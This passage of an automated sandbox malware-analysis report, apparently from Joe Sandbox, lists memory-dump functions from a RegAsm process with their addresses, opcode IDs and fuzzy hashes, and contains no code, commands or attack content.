                                                                                                • Opcode Fuzzy Hash: ab0719334e946a70301f6dec6008b92d289ee0bc03b4ea3c5a81b6d84f2c0cec
                                                                                                • Instruction Fuzzy Hash: 9521F1B2A00525CFCB00DF98D980A9AF7B2FF40305F1586A5D455ABB52C331FC06DBA1
                                                                                                Function 07025B60 Relevance: .1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6eefbc8a7e95920e93af03e882225284e43283d1383bc2ea388bb6562d0fc0c3
                                                                                                • Instruction ID: 5d9c7ed85b34b4f606dc3b17a06983cf1b75b5fb805c9e3163a959df6edb1948
                                                                                                • Opcode Fuzzy Hash: 6eefbc8a7e95920e93af03e882225284e43283d1383bc2ea388bb6562d0fc0c3
                                                                                                • Instruction Fuzzy Hash: 65113872B053496FC705EB788C10A9E3BABEFC220070481AAD104CF251DE35CE46D3E2
                                                                                                Function 07026A49 Relevance: .1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 070bd8e0a3867abf8c29949bfbdb096dd6f4f68db59601083c3129bc523f16d0
                                                                                                • Instruction ID: 7dc5e4c5fb9aa8677ebf52f1a9f3b9e7e87105a341f143602f306a78932ef3da
                                                                                                • Opcode Fuzzy Hash: 070bd8e0a3867abf8c29949bfbdb096dd6f4f68db59601083c3129bc523f16d0
                                                                                                • Instruction Fuzzy Hash: 921104706017419FEB56FB38D8406ED77A1EF82254B608B69D1008F682DB399D0B8BD3
                                                                                                Function 070234F0 Relevance: .1, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7c9de2c5d8183bcaba3237efcbd04fd5cd959804cb7d1d8b71130dc727c23e0
                                                                                                • Instruction ID: 43ac2a90ada2ee8770528f6a5803c0c744bdeb4281f300b42102046b709b4ff8
                                                                                                • Opcode Fuzzy Hash: a7c9de2c5d8183bcaba3237efcbd04fd5cd959804cb7d1d8b71130dc727c23e0
                                                                                                • Instruction Fuzzy Hash: 491139763001249FCB08DF59E894C5A7BBAFF8C761B148156FA098B365CB32DC12DBA0
                                                                                                Function 0188D2C7 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e173d83260521b16678ca7d2b1e0f986cdc6a2ea89473de2067ebc38b1b599b3
                                                                                                • Instruction ID: c9b803fbfd2954180f8874276462b497af3f8d5bcdf2c15e83c24060c6a784d7
                                                                                                • Opcode Fuzzy Hash: e173d83260521b16678ca7d2b1e0f986cdc6a2ea89473de2067ebc38b1b599b3
                                                                                                • Instruction Fuzzy Hash: 3311B276504680DFDB12DF14D5C4B19FF61FB84324F24C6A9D8494B686C33AD546CB52
                                                                                                Function 0188D0F7 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                                • Instruction ID: 8a583b47838f3467644ce8c671e18847841a0c398e3f8cf9e2a0496c62e0d6ed
                                                                                                • Opcode Fuzzy Hash: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                                • Instruction Fuzzy Hash: 3611D979504680DFDB06DF54DA80B15FBA1EB84314F28CAA9D8098B692C33AD44ACB62
                                                                                                Function 0188D477 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                                • Instruction ID: bd74f5e47b29ed5ec59dbbb2f488067f3a1d5f7ab3285febe648963e60554061
                                                                                                • Opcode Fuzzy Hash: 81dc69f17ca08604d604c64cef90923a1607f1b6571ccfc77995c09e0a8f60c7
                                                                                                • Instruction Fuzzy Hash: 4911BB76504680DFDB06DF54D5C0B15BFA1FB84318F28C6AAE8098B696C33AD54ACF62
                                                                                                Function 07026A58 Relevance: .1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d54543cd5a9cc8f86fb0efa53270028231a6b7e2e0a3171aa4261250432d4db5
                                                                                                • Instruction ID: a929c300f2fe6f0744e70c681eb9f6a09fe4614b208d1d98b82a1a53c394a4bc
                                                                                                • Opcode Fuzzy Hash: d54543cd5a9cc8f86fb0efa53270028231a6b7e2e0a3171aa4261250432d4db5
                                                                                                • Instruction Fuzzy Hash: 5C11C2706017559BDB55FB38E84069D77A2EB85254B608B29D1008F282EF75ED0B8BD3
                                                                                                Function 07022EC8 Relevance: .1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a90d85b5d8ffc5cbb67ee3a60b272b391ebaacb56f25c2b1ab22d12de7c444da
                                                                                                • Instruction ID: 1d16398e6e9d12be13994fdc57f0f51e4b9c63a114dfffb76467dffb70401f82
                                                                                                • Opcode Fuzzy Hash: a90d85b5d8ffc5cbb67ee3a60b272b391ebaacb56f25c2b1ab22d12de7c444da
                                                                                                • Instruction Fuzzy Hash: 8D01DB71B012046BCB50EAA99C409DFBBEADFC92507158236E909D7305DA309D0293F1
                                                                                                Function 07024BA1 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c31599c03b1ad869e5e3ebae1a20bbd746fe469b2daed38af329f2d1353e5620
                                                                                                • Instruction ID: 25fc9de22b8bada8bc0e69bb6c41af206f69c3d428a134a9846857676a73f11e
                                                                                                • Opcode Fuzzy Hash: c31599c03b1ad869e5e3ebae1a20bbd746fe469b2daed38af329f2d1353e5620
                                                                                                • Instruction Fuzzy Hash: 8C014B72305228AF8B01DF59DC84C9FBFAEEF8D260715815AF549C7361CB7099028BA0
                                                                                                Function 07022DF7 Relevance: .0, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f52ea4c1315e1ebc7fedbcc303a1f887911585c6ae389a1f9bea57cf316c68b6
                                                                                                • Instruction ID: af28ffcb1b096f5cb41db1dcd1a8e2de149248e5acffb82b28d9baf5a6863421
                                                                                                • Opcode Fuzzy Hash: f52ea4c1315e1ebc7fedbcc303a1f887911585c6ae389a1f9bea57cf316c68b6
                                                                                                • Instruction Fuzzy Hash: 19017874D01319EFCB50DFA8E840ADABBF1FF48304B108628D559A7340D731AA42CF90
                                                                                                Function 070250A8 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bef2afa5892b5062ffbf7b507120572e4cdc549c9f19c187dee6a87af5684346
                                                                                                • Instruction ID: df71ef3aad9aa3370d85fe3d347b60e500bdf6748016225870f31b48efbd24b4
                                                                                                • Opcode Fuzzy Hash: bef2afa5892b5062ffbf7b507120572e4cdc549c9f19c187dee6a87af5684346
                                                                                                • Instruction Fuzzy Hash: BBF024711013646FD32287169C50CEBBBBFFBC4352B18851AF986CBA41C6349956D3B1
                                                                                                Function 07024BB0 Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 19a850570267831c1ece5ad669d8dbd461926fcc82a748de752e35112c9f1e71
                                                                                                • Instruction ID: e1f5f838473e935201e5540e27d5a627aec2b80b2144b589a9692aebfec85f04
                                                                                                • Opcode Fuzzy Hash: 19a850570267831c1ece5ad669d8dbd461926fcc82a748de752e35112c9f1e71
                                                                                                • Instruction Fuzzy Hash: A6F0F976700128AF8B44DF59D884C9FBBAEFF8C260714802AF509C7310CA7199018BA0
                                                                                                Function 07025B50 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 850234dd28c2c1e250c76cc4359c7294f6b49a9d90f77cf0a29ef9ce2b4ffbdd
                                                                                                • Instruction ID: 812dbadb088c1f1547f2368121dd3fc941cff2e5663c51d090129f47b8df1608
                                                                                                • Opcode Fuzzy Hash: 850234dd28c2c1e250c76cc4359c7294f6b49a9d90f77cf0a29ef9ce2b4ffbdd
                                                                                                • Instruction Fuzzy Hash: 86F0E5B26197542FC315977C8C109DB6BAEDB8251070582A6E088CFA52DE748C9283E2
                                                                                                Function 07022E08 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d074b555659945d2978815ca82cf15cad6dba53efee095eb2fae6bb4c588b87b
                                                                                                • Instruction ID: 16703b9fe81aa8fc92b6205140cc86c40fa2ce678c779d6aa21d6db0685471c9
                                                                                                • Opcode Fuzzy Hash: d074b555659945d2978815ca82cf15cad6dba53efee095eb2fae6bb4c588b87b
                                                                                                • Instruction Fuzzy Hash: D4F01470D0021ADFCB54DFA9D8446AEB7F1FF48314F608529D519A7210E335AA42CF80
                                                                                                Function 070250B8 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 02cb89dbd6ef51b58c7de31794059ef31ced9325cc055262595b2aef07bf9287
                                                                                                • Instruction ID: 0ee7fae933e1b2001cb66f6c8f492a3d95586c6b14c632058a79279b3d53bd9b
                                                                                                • Opcode Fuzzy Hash: 02cb89dbd6ef51b58c7de31794059ef31ced9325cc055262595b2aef07bf9287
                                                                                                • Instruction Fuzzy Hash: 1BF0A7725006246FD320565ADC40DB7BBFEFBC8321B148529F94683600C675A842D7B1
                                                                                                Function 070245D8 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cd88f96f7051e33f23a79e556946602a64b4f9538dfbc446608f5ac87db6dfa6
                                                                                                • Instruction ID: ba39f6d97dbc4fdac6200c23e293553344cee9c1d6c0906d6018b7504d2d2c1b
                                                                                                • Opcode Fuzzy Hash: cd88f96f7051e33f23a79e556946602a64b4f9538dfbc446608f5ac87db6dfa6
                                                                                                • Instruction Fuzzy Hash: 1FE0D86130A3642BC741767D685049BBFEAEBC656079501BFE249C7342DD614C0683F7
                                                                                                Function 07026AB3 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d593d1be17efeed7732dabbdb61e6a60b0b2c13f0d54f778bab1b6bc9aca3a9
                                                                                                • Instruction ID: db8f3927d021313e051ad4716ceb2e9a283fd4d23090698413a4cb1c09f1e464
                                                                                                • Opcode Fuzzy Hash: 8d593d1be17efeed7732dabbdb61e6a60b0b2c13f0d54f778bab1b6bc9aca3a9
                                                                                                • Instruction Fuzzy Hash: 84F055B16007868BDF81B734E80429C7751AF812E0F208721C0004F641EF38D96787C3
                                                                                                Function 070245E8 Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4bba17aa6de467cd48baf6aa863f19b2f1922e0fc6aac85f4257fc487b0113ff
                                                                                                • Instruction ID: f3249b1cbe0872bac5e5b5632db2aace34f8003a7b57817832aa9643e2abe624
                                                                                                • Opcode Fuzzy Hash: 4bba17aa6de467cd48baf6aa863f19b2f1922e0fc6aac85f4257fc487b0113ff
                                                                                                • Instruction Fuzzy Hash: 65D02EA2300130138644219E288086FAACEEBC9960780003EE20DC3300CD219C0243E6

                                                                                                Non-executed Functions

                                                                                                Function 0702466A Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7l^H$7l^Q$7l^Z$7l^c
                                                                                                • API String ID: 0-2174990222
                                                                                                • Opcode ID: 87f897bcd953d334002ccb494bb03de6c24893b9d48a1cc75dae3de25a6c810f
                                                                                                • Instruction ID: 1224b53c92a41996ae5026893d2115f7568bde353d4a8d7cd0f11985d7f83933
                                                                                                • Opcode Fuzzy Hash: 87f897bcd953d334002ccb494bb03de6c24893b9d48a1cc75dae3de25a6c810f
                                                                                                • Instruction Fuzzy Hash: 2B0147E3A40A384EE201BB7C64085C1AF92ED545B8B16126BD544CF203D574488AE7EE